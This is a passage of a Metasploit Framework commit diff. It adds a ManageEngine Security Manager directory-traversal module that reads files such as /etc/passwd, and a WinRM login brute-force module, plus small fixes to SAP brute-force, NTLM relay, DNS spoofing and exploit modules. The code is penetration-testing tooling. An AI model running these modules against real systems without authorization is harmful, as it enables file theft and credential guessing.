+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => "Oct 19 2012"
+ ))
+
+ register_options(
+ [
+ OptPort.new('RPORT', [true, 'The target port', 6262]),
+ OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
+ OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),
+ OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])
+ ], self.class)
+ end
+
+
+ def run_host(ip)
+ base = target_uri.path
+ base << '/' if base[-1,1] != '/'
+
+ peer = "#{ip}:#{rport}"
+ fname = datastore['FILE']
+
+ print_status("#{peer} - Reading '#{datastore['FILE']}'")
+ traverse = "../" * datastore['DEPTH']
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "#{base}store",
+ 'vars_get' => {
+ 'f' => "#{traverse}#{datastore['FILE']}"
+ }
+ })
+
+
+ if res and res.code == 500 and res.body =~ /Error report/
+ print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:")
+ print_error("\t1. File does not exist.")
+ print_error("\t2. The server does not have any patches deployed.")
+ print_error("\t3. Your 'DEPTH' option isn't deep enough.")
+ print_error("\t4. Some kind of permission issues.")
+
+ elsif res and res.code == 200
+ data = res.body
+ p = store_loot(
+ 'manageengine.securitymanager',
+ 'application/octet-stream',
+ ip,
+ data,
+ fname
+ )
+
+ vprint_line(data)
+ print_good("#{peer} - #{fname} stored as '#{p}'")
+
+ else
+ print_error("#{peer} - Fail to obtain file for some unknown reason")
+ end
+ end
+
+end
4 modules/auxiliary/scanner/http/nginx_source_disclosure.rb
View
@@ -31,8 +31,8 @@ def initialize
[ 'CVE', '2010-2263' ],
[ 'OSVDB', '65531' ],
[ 'BID', '40760' ],
- [ 'EDB', 13818 ],
- [ 'EDB', 13822 ]
+ [ 'EDB', '13818' ],
+ [ 'EDB', '13822' ]
],
'Author' =>
[
4 modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
View
@@ -89,8 +89,8 @@ def enum_user(user='administrator', pass='pass')
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 45)
- return :abort if (res.code == 404)
- success = true if(res.body.match(/SessionInfo/i))
+ return :abort if (!res or (res and res.code == 404))
+ success = true if(res and res.body.match(/SessionInfo/i))
success
rescue ::Rex::ConnectionError
2  modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb
View
@@ -75,7 +75,7 @@ def enum_user(user, pass)
'Accept-Encoding' => "gzip,deflate",
},
}, 45)
- return :abort if (res.code != 200)
+ return :abort if (!res or (res and res.code != 200))
if(res.body.match(/Account Information/i))
success = false
else
4 modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb
View
@@ -93,8 +93,8 @@ def enum_user(user='administrator', pass='invalid-sap-password-0d03b389-b7a1-4ec
}, 45)
if res
- return :abort if (res.code == 404)
- success = true if(res.body.match(/Invalid password/i))
+ return :abort if (!res or (res and res.code == 404))
+ success = true if(res and res.body.match(/Invalid password/i))
success
else
vprint_error("[SAP BusinessObjects] No response")
2  modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
View
@@ -126,6 +126,8 @@ def enum_user(user, pass)
}
}, 45)
+ return if not res
+
if (res.code != 500 and res.code != 200)
return
else
2  modules/auxiliary/scanner/smb/smb_version.rb
View
@@ -101,6 +101,8 @@ def run_host(ip)
conf[:os_sp] = res['sp'] if res['sp']
conf[:os_lang] = res['lang'] if res['os'] =~ /Windows/
+ conf[:SMBName] = simple.client.default_name if simple.client.default_name
+ conf[:SMBDomain] = simple.client.default_domain if simple.client.default_domain
report_note(
:host => ip,
2  modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
View
@@ -28,7 +28,7 @@ def initialize
[
['BID', '51182'],
['CVE', '2011-4862'],
- ['EDB', 18280],
+ ['EDB', '18280'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons']
]
)
2  modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb
View
@@ -30,7 +30,7 @@ def initialize(info={})
[
['OSVDB', '77455'],
['BID', '50890'],
- ['EDB', 18189],
+ ['EDB', '18189'],
['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt']
],
'DisclosureDate' => "Dec 12 2011"
64 modules/auxiliary/scanner/winrm/winrm_auth_methods.rb
View
@@ -0,0 +1,64 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::WinRM
+ include Msf::Auxiliary::Report
+
+
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'WinRM Authentication Method Detection',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service.
+ If it is a WinRM service, it also gathers the Authentication Methods supported.
+ },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE
+ )
+
+ deregister_options('USERNAME', 'PASSWORD')
+
+ end
+
+
+ def run_host(ip)
+ resp = winrm_poke
+ return nil if resp.nil?
+ if resp.code == 401 and resp.headers['Server'].include? "Microsoft-HTTPAPI"
+ methods = parse_auth_methods(resp)
+ desc = resp.headers['Server'] + " Authentication Methods: " + methods.to_s
+ report_service(
+ :host => ip,
+ :port => rport,
+ :proto => 'tcp',
+ :name => 'winrm',
+ :info => desc
+ )
+ print_good "#{ip}:#{rport}: Negotiate protocol supported" if methods.include? "Negotiate"
+ print_good "#{ip}:#{rport}: Kerberos protocol supported" if methods.include? "Kerberos"
+ print_good "#{ip}:#{rport}: Basic protocol supported" if methods.include? "Basic"
+ else
+ print_error "#{ip}:#{rport} Does not appear to be a WinRM server"
+ end
+ end
+
+
+end
79 modules/auxiliary/scanner/winrm/winrm_login.rb
View
@@ -0,0 +1,79 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::WinRM
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::AuthBrute
+
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'WinRM Login Utility',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module attempts to authenticate to a WinRM service. It currently
+ works only if the remote end allows Negotiate(NTLM) authentication.
+ Kerberos is not currently supported.
+ },
+ 'Author' => [ 'thelightcosine' ],
+ 'References' =>
+ [
+ [ 'CVE', '1999-0502'] # Weak password
+ ],
+ 'License' => MSF_LICENSE
+ )
+
+ end
+
+
+ def run_host(ip)
+ unless accepts_ntlm_auth
+ print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
+ return
+ end
+ each_user_pass do |user, pass|
+ resp,c = send_request_ntlm(test_request)
+ if resp.nil?
+ print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out"
+ return
+ elsif resp.code == 200
+ cred_hash = {
+ :host => ip,
+ :port => rport,
+ :sname => 'winrm',
+ :pass => pass,
+ :user => user,
+ :source_type => "user_supplied",
+ :active => true
+ }
+ report_auth_info(cred_hash)
+ print_good "#{ip}:#{rport}: Valid credential found: #{user}:#{pass}"
+ elsif resp.code == 401
+ print_error "#{ip}:#{rport}: Login failed: #{user}:#{pass}"
+ else
+ print_error "Recieved unexpected Response Code: #{resp.code}"
+ end
+ end
+ end
+
+
+ def test_request
+ data = winrm_wql_msg("Select Name,Status from Win32_Service")
+ end
+
+end
2  modules/auxiliary/server/capture/drda.rb
View
@@ -38,7 +38,7 @@ class Constants
def initialize
super(
'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)',
- 'Version' => '$Revision: 14774 $',
+ 'Version' => '$Revision$',
'Description' => %q{
This module provides a fake DRDA (DB2, Informix, Derby) server
that is designed to capture authentication credentials.
3  modules/auxiliary/server/http_ntlmrelay.rb
View
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'HTTP Client MS Credential Relayer',
- 'Version' => '$Revision:$',
+ 'Version' => '$Revision$',
'Description' => %q{
This module relays negotiated NTLM Credentials from an HTTP server to multiple
protocols. Currently, this module supports relaying to SMB and HTTP.
@@ -52,7 +52,6 @@ def initialize(info = {})
[
'Rich Lundeen <richard.lundeen[at]gmail.com>',
],
- 'Version' => '$Revision:$',
'License' => MSF_LICENSE,
'Actions' =>
[
2  modules/auxiliary/spoof/dns/bailiwicked_domain.rb
View
@@ -144,7 +144,7 @@ def cmd_check(*args)
end
if(reps < 30)
- print_status("WARNING: This server did not reply to all of our requests")
+ print_warning("WARNING: This server did not reply to all of our requests")
end
if(random)
2  modules/auxiliary/spoof/dns/bailiwicked_host.rb
View
@@ -134,7 +134,7 @@ def cmd_check(*args)
end
if(reps < 30)
- print_status("WARNING: This server did not reply to all of our requests")
+ print_warning("WARNING: This server did not reply to all of our requests")
end
if(random)
2  modules/auxiliary/vsploit/pii/web_pii.rb
View
@@ -25,7 +25,7 @@ def initialize(info = {})
'Description' => 'This module emulates a webserver leaking PII data',
'License' => MSF_LICENSE,
'Author' => 'MJC',
- 'Version' => '$Revision: $',
+ 'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com'],
2  modules/encoders/x86/context_cpuid.rb
View
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
def initialize
super(
'Name' => 'CPUID-based Context Keyed Payload Encoder',
- 'Version' => '$Revision: 1$',
+ 'Version' => '$Revision$',
'Description' => %q{
This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.
},
2  modules/exploits/freebsd/tacacs/xtacacsd_report.rb
View
@@ -41,7 +41,7 @@ def initialize(info = {})
'PrependEncoder' => "\x83\xec\x7f",
'DisableNops' => 'True',
},
- 'Platform' => 'BSD',
+ 'Platform' => 'bsd',
'Arch' => ARCH_X86,
'Targets' =>
[
2  modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
View
@@ -33,7 +33,7 @@ def initialize(info = {})
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
- ['EDB', 18280]
+ ['EDB', '18280']
],
'Privileged' => true,
'Platform' => 'bsd',
1  modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
View
@@ -70,6 +70,7 @@ def check
end
def on_new_session(client)
+ print_warning("Deleting temp.php")
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
client.fs.file.rm("temp.php")
4 modules/exploits/linux/http/webid_converter.rb
View
@@ -31,7 +31,7 @@ def initialize(info = {})
[ 'OSVDB', '73609' ],
[ 'EDB', '17487' ]
],
- 'Version' => '$Revision: $',
+ 'Version' => '$Revision$',
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
@@ -109,7 +109,7 @@ def on_new_session(client)
res = client.fs.file.search(nil, "currencies.php", true, -1)
res.each do |hit|
filename = "#{hit['path']}/#{hit['name']}"
- print_status("#{peer} - Restoring #{filename}")
+ print_warning("#{peer} - Restoring #{filename}")
client.fs.file.rm(filename)
fd = client.fs.file.new(filename, "wb")
fd.write(currencies_php)
2  modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
View
@@ -33,7 +33,7 @@ def initialize(info = {})
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'License' => MSF_LICENSE,
- 'Version' => '$Revision: 3 $',
+ 'Version' => '$Revision$',
'Privileged' => false,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
1  modules/exploits/linux/local/sock_sendpage.rb
View
@@ -13,6 +13,7 @@
require 'msf/core/exploit/local/linux_kernel'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'
+require 'msf/core/exploit/exe'
#load 'lib/msf/core/